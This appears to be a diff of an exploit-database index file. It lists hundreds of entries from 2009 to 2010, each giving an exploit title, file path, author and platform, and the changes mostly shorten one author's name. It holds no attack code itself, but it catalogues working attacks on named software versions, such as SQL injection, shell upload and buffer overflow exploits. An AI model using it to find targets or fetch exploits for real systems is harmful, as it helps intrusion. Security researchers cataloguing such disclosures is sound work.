10874,platforms/php/webapps/10874.txt,"Pre News Manager (nid) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0
10876,platforms/php/webapps/10876.txt,"PHP-MySQL-Quiz SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0
10877,platforms/php/webapps/10877.txt,"php-addressbook 3.1.5 - (edit.php) SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0
10878,platforms/php/webapps/10878.txt,"Invision Power Board (Trial) 2.0.4 - Backup Vulnerability",2009-12-31,"indoushka salah el ddine",php,webapps,0
10878,platforms/php/webapps/10878.txt,"Invision Power Board (Trial) 2.0.4 - Backup Vulnerability",2009-12-31,indoushka,php,webapps,0
10879,platforms/windows/dos/10879.html,"Google Chrome 3.0195.38 Status Bar Obfuscation",2009-12-31,"599eme Man",windows,dos,0
10880,platforms/php/webapps/10880.php,"bbScript <= 1.1.2.1 (id) Blind SQL Injection Exploit",2009-12-31,cOndemned,php,webapps,0
10881,platforms/windows/dos/10881.pl,"Apollo Player 37.0.0.0 .aap BOF DoS Vulnerability",2009-12-31,jacky,windows,dos,0
@ -10081,13 +10081,13 @@ id,file,description,date,author,platform,type,port
10920,platforms/windows/dos/10920.cpp,"VirtualDJ Trial 6.0.6 ""New Year Edition"" - .m3u Exploit (0day)",2010-01-02,"fl0 fl0w",windows,dos,0
10921,platforms/php/webapps/10921.txt,"eazyPortal 1.0.0 - Multiple Vulnerabilities",2010-01-02,"Milos Zivanovic ",php,webapps,0
10923,platforms/php/webapps/10923.txt,"superlink script <= 1.0 - (id) SQL Injection Vulnerability",2010-01-02,Red-D3v1L,php,webapps,0
10924,platforms/php/webapps/10924.txt,"AL-Athkat.2.0 - Cross Site Scripting Vulnerability",2010-01-02,"indoushka salah el ddine",php,webapps,0
10924,platforms/php/webapps/10924.txt,"AL-Athkat.2.0 - Cross Site Scripting Vulnerability",2010-01-02,indoushka,php,webapps,0
10928,platforms/php/webapps/10928.txt,"Joomla Component com_dailymeals LFI Vulnerability",2010-01-02,FL0RiX,php,webapps,0
10929,platforms/php/webapps/10929.txt,"Wordpress Events Plugin SQL Injection Vulnerability",2010-01-02,Red-D3v1L,php,webapps,0
10930,platforms/php/webapps/10930.txt,"Left 4 Dead Stats 1.1 - SQL Injection Vulnerability",2010-01-02,Sora,php,webapps,0
10931,platforms/php/webapps/10931.txt,"X7CHAT 1.3.6b - Add Admin Exploit",2010-01-02,d4rk-h4ck3r,php,webapps,0
10936,platforms/windows/local/10936.c,"PlayMeNow Malformed M3U Playlist BOF WinXP SP2 Fr",2010-01-03,bibi-info,windows,local,0
10938,platforms/php/webapps/10938.txt,"Service d'upload 1.0.0 - Shell Upload Vulnerability",2010-01-03,"indoushka salah el ddine",php,webapps,0
10938,platforms/php/webapps/10938.txt,"Service d'upload 1.0.0 - Shell Upload Vulnerability",2010-01-03,indoushka,php,webapps,0
10940,platforms/asp/webapps/10940.txt,"Football Pool 3.1 - Database Disclosure Vulnerability",2010-01-03,LionTurk,asp,webapps,0
10941,platforms/php/webapps/10941.php,"Joomla Component com_aprice Blind SQL Injection Exploit",2010-01-03,FL0RiX,php,webapps,0
10942,platforms/php/webapps/10942.txt,"Joomla Component com_cartweberp LFI Vulnerability",2010-01-03,FL0RiX,php,webapps,0
@ -10121,23 +10121,23 @@ id,file,description,date,author,platform,type,port
10981,platforms/php/webapps/10981.pl,"Smart Vision Script News (newsdetail) SQL Injection Exploit",2010-01-04,darkmasking,php,webapps,0
10983,platforms/php/webapps/10983.txt,"Pay Per Minute Video Chat Script 2.0 & 2.1 - Multiple Vulnerabilities",2010-01-04,R3d-D3V!L,php,webapps,0
10984,platforms/php/webapps/10984.txt,"Joomla component com_cartikads Remote File Upload Vulnerability",2010-01-04,kaMtiEz,php,webapps,0
10986,platforms/php/webapps/10986.txt,"Gbook MX 4.1.0 Arabic Version - File Inclusion Vulnerability",2010-01-04,"indoushka salah el ddine",php,webapps,0
10986,platforms/php/webapps/10986.txt,"Gbook MX 4.1.0 Arabic Version - File Inclusion Vulnerability",2010-01-04,indoushka,php,webapps,0
10988,platforms/php/webapps/10988.txt,"Joomla Component com_j-projects Blind SQL Injection Vulnerability",2010-01-04,Pyske,php,webapps,0
10991,platforms/php/webapps/10991.txt,"Ninja Blog 4.8 - Multiple Vulnerabilities",2010-01-04,"indoushka salah el ddine",php,webapps,0
10999,platforms/multiple/webapps/10999.txt,"W-Agora 4.2.1 - Multiple Vulnerabilities",2010-01-04,"indoushka salah el ddine",multiple,webapps,0
10991,platforms/php/webapps/10991.txt,"Ninja Blog 4.8 - Multiple Vulnerabilities",2010-01-04,indoushka,php,webapps,0
10999,platforms/multiple/webapps/10999.txt,"W-Agora 4.2.1 - Multiple Vulnerabilities",2010-01-04,indoushka,multiple,webapps,0
11002,platforms/php/webapps/11002.txt,"ImagoScripts Deviant Art Clone SQL Injection Vulnerability",2010-01-04,alnjm33,php,webapps,0
11003,platforms/php/webapps/11003.txt,"LightOpen CMS Remote File Inclusion (smarty.php)",2010-01-04,"Zer0 Thunder",php,webapps,0
11005,platforms/asp/webapps/11005.txt,"KMSoft Guestbook 1.0 - Database Disclosure Vulnerability",2010-01-04,LionTurk,asp,webapps,0
11008,platforms/asp/webapps/11008.txt,"YP Portal MS-Pro Surumu 1.0 DB Download Vulnerability",2010-01-05,"indoushka salah el ddine",asp,webapps,0
11008,platforms/asp/webapps/11008.txt,"YP Portal MS-Pro Surumu 1.0 DB Download Vulnerability",2010-01-05,indoushka,asp,webapps,0
11009,platforms/multiple/dos/11009.pl,"Novell Netware CIFS And AFP Remote Memory Consumption DoS",2010-01-05,"Francis Provencher",multiple,dos,0
11010,platforms/windows/local/11010.rb,"PlayMeNow 7.3 & 7.4 - Buffer Overflow (meta)",2010-01-06,blake,windows,local,0
11012,platforms/php/webapps/11012.txt,"ITaco Group ITaco.biz (view_news) SQL Injection Vulnerability",2010-01-06,Err0R,php,webapps,0
11013,platforms/php/webapps/11013.txt,"PHPDirector Game Edition Multiple Vulnerabilities (LFI/SQLi/Xss)",2010-01-06,"Zer0 Thunder",php,webapps,0
11014,platforms/php/webapps/11014.txt,"Myuploader >> upload shell exploit",2010-01-06,S2K9,php,webapps,0
11015,platforms/asp/webapps/11015.txt,"Lebi soft Ziyaretci Defteri 7.5 - DB Download Vulnerability",2010-01-06,"indoushka salah el ddine",asp,webapps,0
11016,platforms/asp/webapps/11016.txt,"Net Gitar Shop 1.0 - DB Download Vulnerability",2010-01-06,"indoushka salah el ddine",asp,webapps,0
11017,platforms/php/webapps/11017.txt,"PHPDug 2.0.0 - Cross Site Scripting Vulnerability",2010-01-06,"indoushka salah el ddine",php,webapps,0
11018,platforms/asp/webapps/11018.txt,"VP-ASP Shopping Cart 7.0 DB Download Vulnerability",2010-01-06,"indoushka salah el ddine",asp,webapps,0
11015,platforms/asp/webapps/11015.txt,"Lebi soft Ziyaretci Defteri 7.5 - DB Download Vulnerability",2010-01-06,indoushka,asp,webapps,0
11016,platforms/asp/webapps/11016.txt,"Net Gitar Shop 1.0 - DB Download Vulnerability",2010-01-06,indoushka,asp,webapps,0
11017,platforms/php/webapps/11017.txt,"PHPDug 2.0.0 - Cross Site Scripting Vulnerability",2010-01-06,indoushka,php,webapps,0
11018,platforms/asp/webapps/11018.txt,"VP-ASP Shopping Cart 7.0 DB Download Vulnerability",2010-01-06,indoushka,asp,webapps,0
11019,platforms/php/webapps/11019.txt,"MobPartner Counter - Remote File Upload Vulnerability",2010-01-06,"wlhaan hacker",php,webapps,0
11020,platforms/windows/dos/11020.pl,"[GOM Audio Local crash PoC]",2010-01-06,applicationlayer,windows,dos,0
11021,platforms/windows/dos/11021.txt,"Flashget 3.x IEHelper Remote Exec 0day PoC",2010-01-06,superli,windows,dos,0
@ -10217,7 +10217,7 @@ id,file,description,date,author,platform,type,port
11131,platforms/windows/dos/11131.pl,"TurboFTP Server 1.00.712 Remote DoS",2010-01-13,corelanc0d3r,windows,dos,0
11132,platforms/windows/dos/11132.pl,"Nemesis Player (NSP) Local Denial of Service (DoS) Vulnerability",2010-01-13,"Rehan Ahmed",windows,dos,0
11133,platforms/windows/dos/11133.pl,"NPlayer (.dat Skin File) Local Heap Overflow PoC",2010-01-13,"Rehan Ahmed",windows,dos,0
11134,platforms/asp/webapps/11134.txt,"Asp VevoCart Control System 3.0.4 - DB Download Vulnerability",2010-01-13,"indoushka salah el ddine",asp,webapps,0
11134,platforms/asp/webapps/11134.txt,"Asp VevoCart Control System 3.0.4 - DB Download Vulnerability",2010-01-13,indoushka,asp,webapps,0
11135,platforms/php/webapps/11135.txt,"PSI CMS 0.3.1 - SQL Injection",2010-01-13,"learn3r hacker",php,webapps,0
11136,platforms/php/webapps/11136.txt,"Public Media Manager SQLi vulns",2010-01-13,"learn3r hacker",php,webapps,0
11138,platforms/windows/remote/11138.c,"Apple iTunes 8.1.x - (daap) Buffer Overflow Remote Exploit",2010-01-14,Simo36,windows,remote,0
@ -10247,7 +10247,7 @@ id,file,description,date,author,platform,type,port
11166,platforms/php/webapps/11166.txt,"Uploader by CeleronDude 5.3.0 - Upload Vulnerability",2010-01-17,Stink',php,webapps,0
11167,platforms/windows/remote/11167.py,"Internet Explorer Aurora Exploit",2010-01-17,"Ahmed Obied",windows,remote,0
11168,platforms/php/webapps/11168.txt,"Joomla Component com_pc LFI Vulnerability",2010-01-17,Pyske,php,webapps,0
11169,platforms/php/webapps/11169.txt,"Max's Image Uploader Shell Upload Vulnerability",2010-01-17,"indoushka salah el ddine",php,webapps,0
11169,platforms/php/webapps/11169.txt,"Max's Image Uploader Shell Upload Vulnerability",2010-01-17,indoushka,php,webapps,0
11171,platforms/windows/local/11171.pl,"Audiotran 1.4.1 - Direct RET BoF",2010-01-17,jacky,windows,local,0
11172,platforms/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Exec PoC (0day)",2010-01-17,superli,windows,remote,0
11173,platforms/windows/remote/11173.txt,"TrendMicro Web-Deployment ActiveX Remote Exec 0day PoC",2010-01-17,superli,windows,remote,0
@ -10264,7 +10264,7 @@ id,file,description,date,author,platform,type,port
11186,platforms/multiple/webapps/11186.txt,"FreePBX 2.5.1 - SQL injection",2010-01-18,"Ivan Huertas",multiple,webapps,0
11187,platforms/multiple/webapps/11187.txt,"Information disclosure in FreePBX 2.5.x",2010-01-18,"Ivan Huertas",multiple,webapps,0
11188,platforms/php/webapps/11188.txt,"Fatwiki (fwiki) Remote FiLe include RFI",2010-01-18,kaMtiEz,php,webapps,0
11189,platforms/php/webapps/11189.txt,"Soft Direct 1.05 - Multiple Vulnerabilities",2010-01-18,"indoushka salah el ddine",php,webapps,0
11189,platforms/php/webapps/11189.txt,"Soft Direct 1.05 - Multiple Vulnerabilities",2010-01-18,indoushka,php,webapps,0
11190,platforms/windows/dos/11190.txt,"AOL 9.5 ActiveX Heap Overflow Vulnerability",2010-01-19,"Hellcode Research",windows,dos,0
11191,platforms/windows/local/11191.pl,"Millenium MP3 Studio 1.x - (.m3u File) Local Stack Overflow",2010-01-19,NeoCortex,windows,local,0
11192,platforms/windows/dos/11192.txt,"OpenOffice "".slk"" File Parsing Null Pointer Vulnerability",2010-01-19,"Hellcode Research",windows,dos,0
@ -10319,7 +10319,7 @@ id,file,description,date,author,platform,type,port
11257,platforms/windows/remote/11257.rb,"AOL 9.5 Phobos.Playlist 'Import()' Buffer Overflow Exploit (Meta)",2010-01-25,Trancer,windows,remote,0
11258,platforms/php/webapps/11258.html,"Status2k Remote Add Admin Exploit",2010-01-25,alnjm33,php,webapps,0
11260,platforms/windows/dos/11260.txt,"AIC Audio Player 1.4.1.587 Local Crash PoC",2010-01-26,b0telh0,windows,dos,0
11261,platforms/php/webapps/11261.txt,"UGiA PHP UPLOADER 0.2 - Shell Upload Vulnerability",2010-01-26,"indoushka salah el ddine",php,webapps,0
11261,platforms/php/webapps/11261.txt,"UGiA PHP UPLOADER 0.2 - Shell Upload Vulnerability",2010-01-26,indoushka,php,webapps,0
11262,platforms/php/webapps/11262.php,"Joomla 1.5.12 connect back exploit",2010-01-26,"Nikola Petrov",php,webapps,0
11263,platforms/php/webapps/11263.php,"Joomla 1.5.12 read/exec remote files",2010-01-26,"Nikoal Petrov",php,webapps,0
11264,platforms/windows/local/11264.txt,"South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation",2010-01-26,Trancer,windows,local,0
@ -10354,7 +10354,7 @@ id,file,description,date,author,platform,type,port
11298,platforms/php/webapps/11298.txt,"dotProject 2.1.3 XSS and Improper Permissions",2010-01-30,h00die,php,webapps,80
11299,platforms/php/webapps/11299.txt,"crownweb (page.cfm) SQL Injection Vulnerability",2010-01-31,"AtT4CKxT3rR0r1ST ",php,webapps,0
11300,platforms/php/webapps/11300.txt,"Creative SplashWorks-SplashSite (page.php) Blind SQL Injection Vulnerability",2010-01-31,"AtT4CKxT3rR0r1ST ",php,webapps,0
11301,platforms/php/webapps/11301.txt,"Maian Greetings 2.1 - Shell Upload Vulnerability",2010-01-31,"indoushka salah el ddine",php,webapps,0
11301,platforms/php/webapps/11301.txt,"Maian Greetings 2.1 - Shell Upload Vulnerability",2010-01-31,indoushka,php,webapps,0
11303,platforms/php/webapps/11303.txt,"Saman Portal SQL Injection Vulnerability",2010-01-31,"Pouya Daneshmand",php,webapps,0
11305,platforms/php/webapps/11305.txt,"ShoutCMS (content.php) Blind SQL Injection Vulnerability",2010-02-01,"Zero Cold",php,webapps,0
11306,platforms/php/webapps/11306.txt,"Evernew Free Joke Script (viewjokes.php) SQL Injection",2010-02-01,"Hamza 'MizoZ' N.",php,webapps,0
@ -10486,9 +10486,9 @@ id,file,description,date,author,platform,type,port
11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) SQL Injection Vulnerability",2010-02-15,10n1z3d,php,webapps,0
11457,platforms/windows/remote/11457.pl,"Internet Explorer (6/7) Remote Code Execution -Remote User Add Exploit",2010-02-15,"Sioma Labs",windows,remote,0
11458,platforms/php/webapps/11458.txt,"WordPress Copperleaf Photolog SQL injection",2010-02-15,kaMtiEz,php,webapps,0
11460,platforms/php/webapps/11460.txt,"Dodo Upload 1.3 - Upload Shell (Bypass) Vulnerability",2010-02-15,"indoushka salah el ddine",php,webapps,0
11461,platforms/php/webapps/11461.txt,"CoffieNet CMS - Bypass Admin Vulnerability",2010-02-15,"indoushka salah el ddine",php,webapps,0
11462,platforms/php/webapps/11462.txt,"blog ink Bypass Setting Vulnerability",2010-02-15,"indoushka salah el ddine",php,webapps,0
11460,platforms/php/webapps/11460.txt,"Dodo Upload 1.3 - Upload Shell (Bypass) Vulnerability",2010-02-15,indoushka,php,webapps,0
11461,platforms/php/webapps/11461.txt,"CoffieNet CMS - Bypass Admin Vulnerability",2010-02-15,indoushka,php,webapps,0
11462,platforms/php/webapps/11462.txt,"blog ink Bypass Setting Vulnerability",2010-02-15,indoushka,php,webapps,0
11463,platforms/php/webapps/11463.txt,"Joomla Component com_joomportfolio Blind Injection Vulnerability",2010-02-15,snakespc,php,webapps,0
11464,platforms/php/webapps/11464.txt,"Joomla Component com_hdvideoshare SQL Injection Vulnerability",2010-02-15,snakespc,php,webapps,0
11465,platforms/windows/local/11465.py,"Ollydbg 2.00 Beta1 Local Buffer Overflow Exploit",2010-02-15,_SuBz3r0_,windows,local,0
@ -10501,7 +10501,7 @@ id,file,description,date,author,platform,type,port
11473,platforms/php/webapps/11473.txt,"Pogodny CMS SQL Injection Vulnerability",2010-02-16,Ariko-Security,php,webapps,0
11474,platforms/php/webapps/11474.txt,"Mambo Component com_acnews [id] SQL Injection Vulnerability",2010-02-16,"Zero Bits and Xzit3",php,webapps,0
11475,platforms/windows/local/11475.txt,"OtsTurntables Free 1.00.047 - (.olf) Universal Buffer Overflow Exploit",2010-02-16,mr_me,windows,local,0
11476,platforms/php/webapps/11476.txt,"SongForever.com Clone Shell Upload Vulnerability",2010-02-16,"indoushka salah el ddine",php,webapps,0
11476,platforms/php/webapps/11476.txt,"SongForever.com Clone Shell Upload Vulnerability",2010-02-16,indoushka,php,webapps,0
11477,platforms/php/webapps/11477.txt,"Limny 2.0 Change Email and Password - CSRF Exploit",2010-02-16,"Luis Santana",php,webapps,0
11478,platforms/php/webapps/11478.txt,"Limny 2.0 - Create Admin User CSRF Exploit",2010-02-16,"Luis Santana",php,webapps,0
11479,platforms/php/webapps/11479.txt,"Joomla Component com_acstartseite SQL Injection Vulnerability",2010-02-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
@ -10536,12 +10536,12 @@ id,file,description,date,author,platform,type,port
11516,platforms/php/webapps/11516.html,"TimeClock CSRF Remote Add Admin Exploit",2010-02-20,"ViRuSMaN ",php,webapps,0
11517,platforms/php/webapps/11517.txt,"Netzbrett Database Disclosure Vulnerability",2010-02-20,"ViRuSMaN ",php,webapps,0
11518,platforms/php/webapps/11518.txt,"Softbiz Jobs (news_desc) SQL Injection Vulnerability",2010-02-22,BAYBORA,php,webapps,0
11519,platforms/php/webapps/11519.txt,"Ac4p.com Gallery 1.0 - Multiple Vulnerabilities",2010-02-22,"indoushka salah el ddine",php,webapps,0
11519,platforms/php/webapps/11519.txt,"Ac4p.com Gallery 1.0 - Multiple Vulnerabilities",2010-02-22,indoushka,php,webapps,0
11520,platforms/hardware/dos/11520.pl,"iOS iFTPStorage 1.2 - Remote Dos Exploit",2010-02-22,Ale46,hardware,dos,0
11521,platforms/php/webapps/11521.txt,"Ero Auktion 2.0 - (news.php) SQL Injection Vulnerability",2010-02-22,"Easy Laster",php,webapps,0
11522,platforms/php/webapps/11522.txt,"Ero Auktion 2010 - (news.php) SQL Injection Vulnerability",2010-02-22,"Easy Laster",php,webapps,0
11523,platforms/php/webapps/11523.txt,"Galerie Dezign-Box France - Multiple Vulnerabilities",2010-02-22,"indoushka salah el ddine",php,webapps,0
11524,platforms/php/webapps/11524.txt,"Arab Cart 1.0.2.0 - Multiple Vulnerabilities",2010-02-22,"indoushka salah el ddine",php,webapps,0
11523,platforms/php/webapps/11523.txt,"Galerie Dezign-Box France - Multiple Vulnerabilities",2010-02-22,indoushka,php,webapps,0
11524,platforms/php/webapps/11524.txt,"Arab Cart 1.0.2.0 - Multiple Vulnerabilities",2010-02-22,indoushka,php,webapps,0
11526,platforms/php/webapps/11526.txt,"vBSEO 3.1.0 - Local File Inclusion Vulnerability",2010-02-22,"ViRuSMaN ",php,webapps,0
11527,platforms/multiple/webapps/11527.html,"cPanel Multiple CSRF Vulnerabilities",2010-02-22,SecurityRules,multiple,webapps,0
11528,platforms/php/webapps/11528.txt,"phpBugTracker 1.0.1 - File Disclosure Vulnerability",2010-02-22,"ViRuSMaN ",php,webapps,0
@ -10570,19 +10570,19 @@ id,file,description,date,author,platform,type,port
11554,platforms/php/webapps/11554.txt,"QuickDev 4 Php Database Disclosure Vulnerability",2010-02-23,"ViRuSMaN ",php,webapps,0
11555,platforms/asp/webapps/11555.txt,"bispage Bypass Vulnerability",2010-02-23,SaMir-BonD,asp,webapps,0
11556,platforms/hardware/dos/11556.pl,"iPhone FTP Server By Zhang Boyang Remote DoS Exploit",2010-02-23,Ale46,hardware,dos,0
11557,platforms/php/webapps/11557.txt,"Max's Photo Album Shell Upload Vulnerability",2010-02-24,"indoushka salah el ddine",php,webapps,0
11558,platforms/php/webapps/11558.txt,"MySmartBB 1.0.0 - Cross Site Scripting Vulnerability",2010-02-24,"indoushka salah el ddine",php,webapps,0
11557,platforms/php/webapps/11557.txt,"Max's Photo Album Shell Upload Vulnerability",2010-02-24,indoushka,php,webapps,0
11558,platforms/php/webapps/11558.txt,"MySmartBB 1.0.0 - Cross Site Scripting Vulnerability",2010-02-24,indoushka,php,webapps,0
11559,platforms/php/webapps/11559.txt,"Article Friendly CSRF Vulnerability",2010-02-24,"pratul agrawal",php,webapps,0
11560,platforms/php/webapps/11560.txt,"WikyBlog 1.7.3rc2 - Multiple Vulnerabilities",2010-02-24,"indoushka salah el ddine",php,webapps,0
11560,platforms/php/webapps/11560.txt,"WikyBlog 1.7.3rc2 - Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps,0
11561,platforms/multiple/local/11561.html,"Mozilla Firefox 3.6 - URL Spoofing Vulnerability",2010-02-24,Unknown,multiple,local,0
11563,platforms/php/webapps/11563.txt,"kalimat new system 1.0 - (index.php) SQL Injection",2009-11-16,ProF.Code,php,webapps,0
11564,platforms/php/webapps/11564.txt,"ShortCMS 1.11F(B) (con) - SQL Injection Vulnerability",2010-02-24,Gamoscu,php,webapps,0
11565,platforms/php/webapps/11565.txt,"phpCOIN 1.2.1 (mod.php) - SQL Injection Vulnerability",2010-02-24,BAYBORA,php,webapps,0
11567,platforms/multiple/dos/11567.txt,"Apple Safari 4.0.4 & Google Chrome 4.0.249 CSS style Stack Overflow DoS/PoC",2010-02-24,"Rad L. Sneak",multiple,dos,0
11568,platforms/php/webapps/11568.txt,"Softbiz Auktios Script Multiple SQL Injection Vulnerabilities",2010-02-24,"Easy Laster",php,webapps,0
11569,platforms/php/webapps/11569.txt,"Web Server Creator Web Portal 0.1 - Multiple Vulnerabilities",2010-02-24,"indoushka salah el ddine",php,webapps,0
11570,platforms/php/webapps/11570.txt,"PBBoard 2.0.5 - Mullti Vulnerability",2010-02-24,"indoushka salah el ddine",php,webapps,0
11571,platforms/php/webapps/11571.txt,"Maian Uploader 4.0 - Shell Upload Vulnerability",2010-02-24,"indoushka salah el ddine",php,webapps,0
11569,platforms/php/webapps/11569.txt,"Web Server Creator Web Portal 0.1 - Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps,0
11570,platforms/php/webapps/11570.txt,"PBBoard 2.0.5 - Mullti Vulnerability",2010-02-24,indoushka,php,webapps,0
11571,platforms/php/webapps/11571.txt,"Maian Uploader 4.0 - Shell Upload Vulnerability",2010-02-24,indoushka,php,webapps,0
11573,platforms/windows/local/11573.c,"MediaCoder 0.7.3.4605 - Local Buffer Overflow Exploit",2010-02-24,"fl0 fl0w",windows,local,0
11574,platforms/hardware/dos/11574.py,"iPhone WebCore::CSSSelector() Remote Crash Vulnerability",2010-02-24,t12,hardware,dos,0
11575,platforms/php/webapps/11575.txt,"Softbiz Classifieds PLUS Multiple SQL Injection Vulnerabilities",2010-02-24,"Easy Laster",php,webapps,0
@ -10604,7 +10604,7 @@ id,file,description,date,author,platform,type,port
11592,platforms/php/webapps/11592.txt,"Scripts Feed Business Directory SQL Injection Vulnerability",2010-02-27,Crux,php,webapps,0
11593,platforms/php/webapps/11593.txt,"Uiga Fan Club <= 1.0 (Auth Bypass) SQL Injection Vulnerability",2010-02-27,"cr4wl3r ",php,webapps,0
11595,platforms/php/webapps/11595.php,"Joomla Component com_paxgallery Blind Injection Vulnerability",2010-02-27,snakespc,php,webapps,0
11596,platforms/php/webapps/11596.txt,"Slaed CMS 4.0 - Multiple Vulnerabilities",2010-02-27,"indoushka salah el ddine",php,webapps,0
11596,platforms/php/webapps/11596.txt,"Slaed CMS 4.0 - Multiple Vulnerabilities",2010-02-27,indoushka,php,webapps,0
11597,platforms/hardware/dos/11597.py,"RCA DCM425 Cable Modem micro_httpd DoS/PoC",2010-02-28,ad0nis,hardware,dos,0
11599,platforms/php/webapps/11599.txt,"Uiga Personal Portal index.php SQL Injection Vulnerability",2010-02-28,"Easy Laster",php,webapps,0
11600,platforms/php/webapps/11600.txt,"Uiga Fan Club index.php SQL Injection Vulnerability",2010-02-28,"Easy Laster",php,webapps,0
@ -10617,16 +10617,16 @@ id,file,description,date,author,platform,type,port
11608,platforms/hardware/dos/11608.rb,"iPhone / iTouch FTPDisc 1.0 3 ExploitsInOne Buffer Overflow DoS",2010-03-01,"Alberto Ortega",hardware,dos,0
11609,platforms/php/webapps/11609.txt,"phptroubleticket - (id) SQL Injection Vulnerability",2010-03-01,kaMtiEz,php,webapps,0
11610,platforms/php/webapps/11610.txt,"CMS by MyWorks Multiple Vulnerabilities",2010-03-01,Palyo34,php,webapps,0
11611,platforms/asp/webapps/11611.txt,"Al Sat Scripti Database Download Vulnerability",2010-03-02,"indoushka salah el ddine",asp,webapps,0
11612,platforms/php/webapps/11612.txt,"osCSS 1.2.1 - Database Backups Disclosure",2010-03-02,"indoushka salah el ddine",php,webapps,0
11613,platforms/php/webapps/11613.txt,"PHP Advanced Transfer Manager 1.10 - Shell Upload Vulnerability",2010-03-02,"indoushka salah el ddine",php,webapps,0
11614,platforms/php/webapps/11614.txt,"Uploadify Sample Collection Shell Upload Vulnerability",2010-03-02,"indoushka salah el ddine",php,webapps,0
11611,platforms/asp/webapps/11611.txt,"Al Sat Scripti Database Download Vulnerability",2010-03-02,indoushka,asp,webapps,0
11612,platforms/php/webapps/11612.txt,"osCSS 1.2.1 - Database Backups Disclosure",2010-03-02,indoushka,php,webapps,0
11613,platforms/php/webapps/11613.txt,"PHP Advanced Transfer Manager 1.10 - Shell Upload Vulnerability",2010-03-02,indoushka,php,webapps,0
11614,platforms/php/webapps/11614.txt,"Uploadify Sample Collection Shell Upload Vulnerability",2010-03-02,indoushka,php,webapps,0
11615,platforms/win32/remote/11615.txt,"Internet Explorer 'winhlp32.exe' 'MsgBox()' Remote Code Execution Vulnerability",2010-03-02,"Maurycy Prodeus ",win32,remote,0
11616,platforms/php/webapps/11616.txt,"My Little Forum contact.php SQL Injection",2010-03-02,"Easy Laster",php,webapps,0
11617,platforms/windows/dos/11617.txt,"Opera + Mozilla Firefox 3.6 - Long String Crash (0day) Exploit",2010-03-02,"Asheesh kumar Mani Tripathi",windows,dos,0
11618,platforms/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Buffer Overflow Exploit",2010-03-02,"S2 Crew",windows,remote,0
11619,platforms/php/webapps/11619.txt,"Uiga Church Portal index.php SQL Injection",2010-03-02,"Easy Laster",php,webapps,0
11620,platforms/php/webapps/11620.txt,"Dosya Yukle Scrtipi 1.0 - Shell Upload Vulnerability",2010-03-03,"indoushka salah el ddine",php,webapps,0
11620,platforms/php/webapps/11620.txt,"Dosya Yukle Scrtipi 1.0 - Shell Upload Vulnerability",2010-03-03,indoushka,php,webapps,0
11621,platforms/php/webapps/11621.txt,"Gnat-TGP <= 1.2.20 Remote File Include Vulnerability",2010-03-03,"cr4wl3r ",php,webapps,0
11622,platforms/windows/dos/11622.php,"Opera <= 10.50 integer overflow",2010-03-03,"Marcin Ressel",windows,dos,0
11623,platforms/php/webapps/11623.txt,"smartplugs 1.3 - SQL Injection showplugs.php",2010-03-03,"Easy Laster",php,webapps,0
@ -10731,12 +10731,12 @@ id,file,description,date,author,platform,type,port
11741,platforms/php/webapps/11741.txt,"Phenix 3.5b - SQL Injection Vulnerability",2010-03-15,ITSecTeam,php,webapps,0
11742,platforms/windows/remote/11742.rb,"Open & Compact FTPd 1.2 Pre-Authentication Buffer Overflow (meta)",2010-03-15,blake,windows,remote,0
11743,platforms/php/webapps/11743.txt,"Joomla component com_rpx Ulti RPX 2.1.0 - Local File Include",2010-03-15,jdc,php,webapps,0
11744,platforms/php/webapps/11744.txt,"Duhok Forum 1.0 script Cross Site Scripting Vulnerability",2010-03-15,"indoushka salah el ddine",php,webapps,0
11745,platforms/php/webapps/11745.txt,"FreeHost 1.00 - Upload Vulnerability",2010-03-15,"indoushka salah el ddine",php,webapps,0
11744,platforms/php/webapps/11744.txt,"Duhok Forum 1.0 script Cross Site Scripting Vulnerability",2010-03-15,indoushka,php,webapps,0
11745,platforms/php/webapps/11745.txt,"FreeHost 1.00 - Upload Vulnerability",2010-03-15,indoushka,php,webapps,0
11746,platforms/php/webapps/11746.txt,"Torrent Hoster Remont Upload Exploit",2010-03-15,EL-KAHINA,php,webapps,0
11747,platforms/php/webapps/11747.txt,"CH-CMS.ch-V2 Upload Vulnerability",2010-03-15,EL-KAHINA,php,webapps,0
11748,platforms/php/webapps/11748.txt,"INTERSPIRE SHOPPING CART 5.5.4 - Ultimate Edition backup dump Vulnerability",2010-03-15,"indoushka salah el ddine",php,webapps,0
11749,platforms/php/webapps/11749.txt,"Subdreamer 3.0.1 - CMS upload Vulnerability",2010-03-15,"indoushka salah el ddine",php,webapps,0
11748,platforms/php/webapps/11748.txt,"INTERSPIRE SHOPPING CART 5.5.4 - Ultimate Edition backup dump Vulnerability",2010-03-15,indoushka,php,webapps,0
11749,platforms/php/webapps/11749.txt,"Subdreamer 3.0.1 - CMS upload Vulnerability",2010-03-15,indoushka,php,webapps,0
11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 <= 8.061970 - (LtXmlComHelp8.dll) OpenFile() Remote 0day Overflow Exploit",2010-03-15,mr_me,windows,remote,0
11752,platforms/php/webapps/11752.txt,"Joomla com_org SQL Injection Vulnerability (letter parameter)",2010-03-15,kazuya,php,webapps,0
11754,platforms/php/webapps/11754.txt,"Address Book Script 1.09 - Local File Inclusion",2010-03-15,"Pouya Daneshmand",php,webapps,0
@ -10801,7 +10801,7 @@ id,file,description,date,author,platform,type,port
11822,platforms/hardware/remote/11822.txt,"ZKSoftware Biometric Attendence managnmnet Hardware[MIPS] Improper Authentication",2010-03-20,fb1h2s,hardware,remote,0
11823,platforms/cgi/webapps/11823.txt,"Trouble Ticket Software ttx.cgi Remote File Download",2010-03-20,n01d,cgi,webapps,0
11824,platforms/php/webapps/11824.py,"Woltlab Burning Board Teamsite Hack <= 3.0 - ts_other.php SQL Injection Exploit",2010-03-21,"Easy Laster",php,webapps,0
11825,platforms/php/webapps/11825.html,"Adult Video Site Script Multiple Vulnerabilities",2010-03-21,"indoushka salah el ddine",php,webapps,0
11825,platforms/php/webapps/11825.html,"Adult Video Site Script Multiple Vulnerabilities",2010-03-21,indoushka,php,webapps,0
